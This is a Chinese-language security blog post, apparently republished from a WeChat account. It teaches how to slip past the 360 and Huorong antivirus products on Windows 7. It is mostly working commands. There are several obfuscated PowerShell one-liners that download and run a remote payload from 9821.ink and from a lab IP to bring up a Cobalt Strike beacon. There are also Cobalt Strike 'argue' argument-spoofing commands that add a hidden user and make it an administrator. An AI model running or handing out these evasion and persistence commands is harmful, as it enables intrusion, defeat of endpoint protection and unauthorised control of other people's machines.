powershell上对抗360与火绒的技巧

  • A+
所属分类:安全文章

0x01 前言

免杀上线一直是经久不衰的话题,今天介绍利用powershell上线来绕过360与火绒的防护,并介绍绕过添加用户的拦截的方式,我们的实验环境是一台装了360全家桶与火绒的win7。


0x02 powershell免杀绕过360与火绒上线

powershell免杀绕过思路参考:

安全客原始payload

Invoke-Expression (New-Object Net.WebClient).DownloadString('http:9821.ink/xxx')
将http分开+号连接
Invoke-Expression(New-Object Net.WebClient).DownloadString("ht"+"tp://9821.ink/xxx")
变量代替
IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink/xxx')
转义符号加在其他字符前不影响字符的意思,避免在0,a,b,f,n,r,t,v的小写字母前出现即可。
Invoke-Expression (New-Object Net.WebClient)."Down`loadString"('h'+'ttp://9821.ink/xxx')
同样可以使用在Net.Webclient上
Invoke-Expression(New-Object "`Ne`T.`Web`Cli`ent")."Down`l`oadString"('h'+'ttp://9821.ink/xxx')


freebuf

powershell -NoExit"$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://9821.ink/xxx'')'.Replace('123','adString');IEX ($c1+$c2)
powershell "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3="$a1,$a2";IEX(-join $a3)"
chabug #别名
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://9821.ink/xxx')
综合起来就成了最开始的上线命令:
powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3=$a1,$a2;kaspersky(-join $a3)"

那么看了一些powershell的绕过上线cs思路,我们来执行修改命令达到上线,首先还是最原始的生成常见的方式来上线cs:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"
powershell上对抗360与火绒的技巧
powershell上对抗360与火绒的技巧
powershell上对抗360与火绒的技巧


我们可以看到,此时火绒发现了系统调用了powershell,立刻进行了拦截,那么我们就要修改powershell上线的命令,进行绕过达到上线。


原命令:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"
我们可以利用powershell的特性,利用别名、分割、替换变量等多个方式来绕过检测。


修改后的命令:

powershell  -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://192.168.12.20:80/a')"
可以看到修改后的命令,对执行的命令进行替换,并将http分开+号连接的思路,便可以达到免杀上线效果。


此时去目标机器执行:

powershell上对抗360与火绒的技巧

360与火绒均无报警,CS已经上线,成功绕过杀软达到上线目的。

powershell上对抗360与火绒的技巧

0x03 绕过杀软添加用户

在内网渗透过程中,有些时候需要往目标机器添加用户,来进行所需操作,但是添加用户杀软非常敏感,都会进行拦截。

为了突出文章目的,我们直接使用cs自带的提权EXP来达到system权限。

powershell上对抗360与火绒的技巧

我们直接在cs进行用户添加。可以看到遭到了360的拦截:

beacon> shell net user tubai [email protected] /add
powershell上对抗360与火绒的技巧
powershell上对抗360与火绒的技巧


此时的思路可以使用cs中argue参数绕过杀软添加用户,#参数污染:

net1 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
powershell上对抗360与火绒的技巧

#查看污染的参数 argue
powershell上对抗360与火绒的技巧

#用污染的net1执行敏感操作

execute net1 user tubai [email protected]123 /add
powershell上对抗360与火绒的技巧

此时shell net user发现,tubai用户已经添加进去,且360与火绒均未拦截。
powershell上对抗360与火绒的技巧


我们再将tubai用户加入到administrator组

beacon> execute net1 localgroup administrators tubai /add
powershell上对抗360与火绒的技巧

此时我们shell net user tubai  ,发现已经成功加入administrators组中

powershell上对抗360与火绒的技巧


至此便绕过了360与火绒对添加用户的拦截。


0x04 总结

powershell的绕过方式除了命令混淆还有很多,免杀的目的就是围绕你的目标机器进行实施的,并非要追求免杀率,过VT,只要过了你的目标机就好。还有,如无特殊需要,渗透过程中还是不添加用户为妙,毕竟日志都有记录,动静也不小。


参考:

http://www.0x3.biz/archives/837.html

https://xz.aliyun.com/t/7903#toc-0




关注公众号回复“9527”可免费获取一套HTB靶场文档和视频,1120”安全参考等安全杂志PDF电子版,1208”个人常用高效爆破字典0221”2020年酒仙桥文章打包还在等什么?赶紧点击下方名片关注学习吧!

推 荐 阅 读




powershell上对抗360与火绒的技巧
powershell上对抗360与火绒的技巧
powershell上对抗360与火绒的技巧

欢 迎 私 下 骚 扰



powershell上对抗360与火绒的技巧

本文始发于微信公众号(潇湘信安):powershell上对抗360与火绒的技巧

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: